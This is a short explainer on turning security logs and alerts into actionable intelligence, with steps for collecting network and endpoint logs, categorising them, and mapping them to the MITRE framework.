Actionable Intelligence Cyber Security
In Cyber security, you will get intelligence from several sources like logs, alerts generated by the appliances in the network, external threat intelligence providers, etc.
At the end of the day, you need actionable intelligence for example “File abc.exe on XYZ system is malicious, and recommended action is to remove the file” or “Recommended action to block specific IP addresses on your firewall which is sending malicious requests to your web server”.
Like above there has to be actionable intelligence for the security team, however creating a set of actionable intelligence feeds is time-consuming and requires expertise from a security analyst, also you need to have absolute clarity on what are True positives and False positives
What is the simple process to follow?
- Have clarity on what alerts and detections you are planning to work with.
- Identify and collect the network-level log sources like Firewall, IDS, IPS, and WAF and collect the required logs from them.
- Identify and collect the Endpoint logs like windows event logs, Linux Syslog, windows defender logs, and antivirus logs.
- Parse the collected data into various buckets and categories.
- Map the data to the MITRE framework, this takes time but you have to start and work continuously.
- Make sure your analysts use the MITRE output as your actionable intelligence after removing the false positives.